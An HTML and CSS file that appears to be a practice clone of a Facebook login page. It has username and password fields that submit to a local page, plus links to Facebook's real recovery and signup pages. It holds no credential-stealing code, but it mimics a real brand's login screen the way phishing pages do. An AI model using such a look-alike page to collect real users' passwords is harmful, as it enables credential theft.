<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <style>

        h2{
            font-size:75px;
            color: rgba(9, 67, 175, 0.555);
            font-style:italic;
        }
        input[type=text]{
            background-color: rgb(236, 210, 210);
            border-start-end-radius: 50px;
        padding:10px 15px;
    margin: 9px;
box-sizing:border-box
border: 2px solid red;
         border-radius:10px;
        }
        input[type=password]{
            background-color: rgb(231, 203, 203);
            border-start-end-radius: 50px;
        padding:10px 15px;
    margin: 8px;
box-sizing:border-box
border: 2px solid red;
         border-radius:10px;
        }
        input[type=submit]{
            background-color: rgba(49, 85, 49, 0.726);
            border-start-end-radius: 50px;
        padding:10px 15px;
    margin: 8px;
box-sizing:border-box
border: 2px solid red;
         border-radius:10px;
        }
        input[type=button]{
            background-color: rgba(54, 58, 54, 0.726);
            border-start-end-radius: 50px;
        padding:10px 15px;
    margin: 8px;
box-sizing:border-box
border: 2px solid red;
         border-radius: 10px;
        }
body{
    padding: 200px 500px 500px 50px;
    background-repeat: no-repeat;

}
body{
    background-image: url("https://www.google.com/url?sa=i&url=https%3A%2F%2Fwww.nytimes.com%2F2019%2F03%2F21%2Ftechnology%2Fpersonaltech%2Ffacebook-deleted.html&psig=AOvVaw0xmdl3tHq09RlR9Szvms5v&ust=1693735432632000&source=images&cd=vfe&opi=89978449&ved=0CBAQjRxqFwoTCMi72caMi4EDFQAAAAAdAAAAABAE");
}
h4{
    font-size:17.5px;
}
    hr{
        
    }
    .background-video{
        position: fixed;
        top: 0;
        left: 0;
        min-width: 100%;
        min-height: 100%;
        z-index: -1;/* place it behind other content*/
    }
    .background-video video
    {
        width: 100%;
        height: 100%;
    }
    </style>
</head>
<body>
    <div class="background-video">
    <video autoplay muted loop>
        <source src="ASSET/mixkit-stars-in-space-background-1610-medium.mp4">
    </video>
    </div>
    <div style="max-width:300px; max-height: 250px; margin: 0 auto;padding-top: 10px;padding-bottom: 320px;padding-left: 60px;padding-right: 90px; border: 2.5px solid none;background-color: rgba(97, 90, 90, 0.842);">
    
    <h2><b><i>Facebook</i></b></h2>
    <form action="fb.html">
       
       <h3><input type="text" name="username" placeholder="Email adress or phonenumber" required></h3> 
       <h3><input type="password" name="pswrd" placeholder="Password" required></h3>
        <input type="submit" value="Login"><br>
        <a href="https://www.facebook.com/login/identify/?ctx=recover&ars=facebook_login&from_login_screen=0" style="color: rgb(40, 9, 238);">Forgotten Password?</a><br>
        
    </form>
    <hr>
    <form action="https://www.facebook.com/signup">
        <h4 style="color: aliceblue;"><i>Don't have an account</i><input type="submit" value="Create new account"></h4>
    </form>

</body>
</html>
